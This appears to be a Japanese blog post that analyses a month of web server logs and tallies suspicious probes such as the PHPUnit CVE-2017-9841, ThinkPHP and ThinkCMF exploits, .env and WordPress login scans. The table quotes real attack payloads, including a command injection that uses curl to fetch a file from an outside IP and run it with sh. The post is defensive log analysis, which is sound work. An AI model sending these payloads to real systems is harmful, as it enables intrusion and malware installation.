3月のwebサーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
PHPUnitの脆弱性CVE-2017-9841のスキャン通信
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
3月のログでは一番多かったです。
最近流行っているみたいです。
CVE-2017-9841を悪用したスキャン通信の増加 – wizSafe Security Signal -安心・安全への道標- IIJ
thinkPHPの脆弱性を利用した攻撃
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
意図不明
/config/getuser?index=0
それらしい脆弱性は見当たりませんでしたが、100回以上同じリクエストがありました。
WordPressの脆弱性を利用した攻撃
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
あまり詳細はわからなかったのですが、WordPressの脆弱性らしいです。
同じIPから複数のWordPressとPHP関連のスキャンが来ていました。
不審な通信の一覧
| url | count |
|---|---|
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 248 |
| /sellers.json | 183 |
| /wp-login.php | 182 |
| /.env | 167 |
| /_ignition/execute-solution | 151 |
| /config/getuser?index=0 | 115 |
| /index.php | 113 |
| /wp-content/plugins/wp-file-manager/readme.txt | 110 |
| /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | 108 |
| /api/jsonws/invoke | 108 |
| /console/ | 107 |
| /Autodiscover/Autodiscover.xml | 107 |
| /manager/html | 89 |
| /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | 87 |
| /solr/admin/info/system?wt=json | 72 |
| /index.xml | 67 |
| /login | 57 |
| /jenkins/login | 50 |
| mstshash=Administr | 44 |
| /?a=fetch&content=die(@md5(HelloThinkCMF)) | 38 |
| /mifs/.;/services/LogService | 36 |
| /?XDEBUG_SESSION_START=phpstorm | 36 |
| /system_api.php | 32 |
| /wp/wp-login.php | 26 |
| /wordpress/wp-login.php | 26 |
| /blog/wp-login.php | 26 |
| /dns-query?dns=AAABAAABAAAAAAAAA3d3dwViYWlkdQNjb20AAAEAAQ | 25 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 23 |
| /boaform/admin/formLogin | 23 |
| /test.php | 22 |
| /actuator/health | 22 |
| /0bef | 22 |
参考
CVE-2017-9841を悪用したスキャン通信の増加 – wizSafe Security Signal -安心・安全への道標- IIJ
